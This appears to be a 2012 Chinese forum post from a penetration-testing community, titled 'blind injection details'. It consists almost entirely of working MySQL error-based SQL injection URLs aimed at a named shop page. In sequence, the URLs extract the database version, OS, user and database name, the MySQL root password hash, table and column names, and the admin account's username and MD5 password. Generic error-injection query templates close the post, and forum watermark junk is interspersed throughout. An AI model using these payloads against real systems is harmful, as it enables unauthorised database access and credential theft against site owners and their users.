中国网络渗透测试联盟

标题: 盲注详细内容 [打印本页]
作者: admin    时间: 2012-9-5 14:59
标题: 盲注详细内容
判断版本号
6 s" C8 E: ~# p. Y8 G, [& x7 \% ehttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
2 R# Z( X2 I3 g% J5 E( c
& P- N3 }  J5 R判断系统
; X% R0 p' {& b3 x$ P% i7 I. @1 o6 N* G
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
. A* A# O" a- n+ G; P3 ~) x+ I% S: ^7 ?. o/ y1 e  ^

' x1 C$ W! X& I& X! R! j9 ^3 |5 a2 q
6 K, n( N! }+ @当前 user()7 G; s  n- l4 n  B% b, f( k

8 |6 h' e8 _- m! a2 Y' X, q5 Qhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23* I& x  P; |5 u2 t7 H  e
% ?5 p; W& a7 S1 G  h: o6 Q3 y/ v
! h; X! q, p1 x
, J+ u) |) ]) l# r: n# O" I
当前 database()) u  y: b2 D- O# z
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23- w, t; c$ Z  U: R( u
5 D) ~* P; Z2 \! d
1 l# X/ |* Q3 ?5 X/ q
- l" [4 `+ ^2 G$ T# @
- h# E. H/ F. [+ a' @
root hash4 H% _- N0 z/ o% O1 n. E

: W  K) [0 c5 t6 P2 ~' U( ghttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23) o  |( d- w2 i8 c7 w

; B  X7 O: P0 i9 T4 r; V' S5 C( C, w. d, L4 R4 ~5 c

- M1 o0 Y' x2 r; o: L& T当前 数据库表名
' a" W% p6 }$ p' A, U: G* F* @4 x& i# X; E
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23  C4 D( p/ Q6 S

5 Y# t6 ?/ f. Y1 S
7 E' C) g  f' J8 ^1 g& z4 c1 N& d! m' s$ l$ B2 s  V4 D. b8 ?" c
当前 数据库 user_name 字段) D$ \: B0 P) L" o

+ ^. m4 J+ V2 L* {: Zhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23+ H6 \( \, k- ^( o6 \8 Y  M

$ T' C6 u; s! G& e5 ~- T/ D当前 数据库 字段 password
$ k, {( Y/ [6 y2 f& j, n9 a9 N. ehttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
2 w1 f7 o# i3 S3 ?& d2 Q) [- J$ _0 d% z6 Y
/ e7 M+ l2 x% t2 a& g1 y2 v
  m) p" _3 A1 o4 n
获得 admin passwd(md5)
3 T/ P* j; m" H: r- ?7 d& |7 @1 v3 L) h2 s3 N3 _0 Q  K
# J9 [+ ^: ]0 A6 G8 w; U
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23$ I" f: s$ r7 q+ q2 ^' M

# W# ]  A, x% o2 f- l报错注射/ p" A% {/ Q7 U4 E: d$ H9 {. h
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
0 R  X- B8 n) T/ ~' `- w% H0 g8 s' X( h% z
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)/ R; D% e; C' r
3 X5 U8 |# K7 b5 H% S8 k
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2